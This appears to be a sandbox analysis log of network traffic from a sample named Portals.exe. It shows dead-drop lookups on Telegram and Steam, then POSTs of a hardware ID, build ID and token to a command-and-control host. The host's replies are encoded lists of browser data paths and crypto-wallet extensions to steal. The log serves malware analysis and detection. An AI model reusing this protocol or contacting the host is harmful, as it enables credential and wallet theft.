                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                    date: Thu, 13 Mar 2025 17:02:16 GMT
                                                                                                                                                                                                    content-length: 1
                                                                                                                                                                                                    Data Raw: 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.449720149.154.167.994438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:01:59 UTC85OUTGET /l793oy HTTP/1.1
                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:01:59 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:01:59 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 12328
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: stel_ssid=fe3759212eb16e0f84_2484407701162572427; expires=Fri, 14 Mar 2025 17:01:59 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                    2025-03-13 17:01:59 UTC12328INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6c 37 39 33 6f 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @l793oy</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.44973023.197.127.214438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:07 UTC119OUTGET /profiles/76561199829660832 HTTP/1.1
                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:08 UTC1962INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:07 GMT
                                                                                                                                                                                                    Content-Length: 38102
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: sessionid=5d6a0d893c5ee69cf7ddd553; Path=/; Secure; SameSite=None
                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Ce270e02e75f28405e3380f7d673593fc; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                    2025-03-13 17:02:08 UTC14422INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                    2025-03-13 17:02:08 UTC10154INData Raw: 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f
                                                                                                                                                                                                    Data Ascii: .com/" data-tooltip-type="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/
                                                                                                                                                                                                    2025-03-13 17:02:08 UTC13526INData Raw: 63 6f 6d 5c 2f 73 74 6f 72 65 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d
                                                                                                                                                                                                    Data Ascii: com\/store\/&quot;,&quot;EREALM&quot;:1,&quot;LOGIN_BASE_URL&quot;:&quot;https:\/\/login.steampowered.com\/&quot;,&quot;AVATAR_BASE_URL&quot;:&quot;https:\/\/avatars.fastly.steamstatic.com\/&quot;,&quot;FROM_WEB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Com


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.449752149.154.167.994438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:37 UTC143OUTGET /l793oy HTTP/1.1
                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    Cookie: stel_ssid=fe3759212eb16e0f84_2484407701162572427
                                                                                                                                                                                                    2025-03-13 17:02:37 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:37 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 12329
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                    2025-03-13 17:02:37 UTC12329INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6c 37 39 33 6f 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @l793oy</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.44975394.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:39 UTC202OUTGET / HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:40 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    4192.168.2.44975494.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:42 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----yukn7900rqq1v3wlfk6f
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:42 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 6b 6e 37 39 30 30 72 71 71 31 76 33 77 6c 66 6b 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 46 32 43 38 41 34 39 35 42 42 38 38 33 38 38 34 31 37 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 79 75 6b 6e 37 39 30 30 72 71 71 31 76 33 77 6c 66 6b 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 79 75 6b 6e 37 39 30 30 72 71 71 31 76 33 77 6c 66 6b 36 66 2d 2d 0d 0a
                                                                                                                                                                                                    Data Ascii: ------yukn7900rqq1v3wlfk6fContent-Disposition: form-data; name="hwid"C8F2C8A495BB883884179-a33c7340-61ca------yukn7900rqq1v3wlfk6fContent-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------yukn7900rqq1v3wlfk6f--
                                                                                                                                                                                                    2025-03-13 17:02:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:43 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:43 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 31 7c 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 7c 31 7c 31 7c 31 7c 31 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 3b1|1|1|1|e92af9ce541d7ec1eecf04841c156a2e|1|1|1|1|0|100000|10


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    5192.168.2.44975594.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:45 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----y5xtr9hdbsjmyuaa1d2d
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 78 74 72 39 68 64 62 73 6a 6d 79 75 61 61 31 64 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 79 35 78 74 72 39 68 64 62 73 6a 6d 79 75 61 61 31 64 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 79 35 78 74 72 39 68 64 62 73 6a 6d 79 75 61 61 31 64 32 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------y5xtr9hdbsjmyuaa1d2dContent-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------y5xtr9hdbsjmyuaa1d2dContent-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------y5xtr9hdbsjmyuaa1d2dCont
                                                                                                                                                                                                    2025-03-13 17:02:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:46 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:46 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    6192.168.2.44975694.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:47 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----tr9z5xbsr1n7yu3oppz5
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 74 72 39 7a 35 78 62 73 72 31 6e 37 79 75 33 6f 70 70 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 74 72 39 7a 35 78 62 73 72 31 6e 37 79 75 33 6f 70 70 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 74 72 39 7a 35 78 62 73 72 31 6e 37 79 75 33 6f 70 70 7a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------tr9z5xbsr1n7yu3oppz5Content-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------tr9z5xbsr1n7yu3oppz5Content-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------tr9z5xbsr1n7yu3oppz5Cont
                                                                                                                                                                                                    2025-03-13 17:02:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:48 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:48 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    7192.168.2.44975794.130.189.584438012C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2025-03-13 17:02:50 UTC294OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----2nopzuasriwln79z5pz5
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                    Host: b.b.goldenloafuae.com
                                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    2025-03-13 17:02:50 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 32 6e 6f 70 7a 75 61 73 72 69 77 6c 6e 37 39 7a 35 70 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 61 66 39 63 65 35 34 31 64 37 65 63 31 65 65 63 66 30 34 38 34 31 63 31 35 36 61 32 65 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 6f 70 7a 75 61 73 72 69 77 6c 6e 37 39 7a 35 70 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 33 32 34 37 31 64 65 38 33 32 33 63 36 36 64 65 34 33 65 62 38 33 31 33 65 38 30 36 66 65 61 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 6f 70 7a 75 61 73 72 69 77 6c 6e 37 39 7a 35 70 7a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ------2nopzuasriwln79z5pz5Content-Disposition: form-data; name="token"e92af9ce541d7ec1eecf04841c156a2e------2nopzuasriwln79z5pz5Content-Disposition: form-data; name="build_id"a32471de8323c66de43eb8313e806fea------2nopzuasriwln79z5pz5Cont
                                                                                                                                                                                                    2025-03-13 17:02:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Thu, 13 Mar 2025 17:02:51 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2025-03-13 17:02:51 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


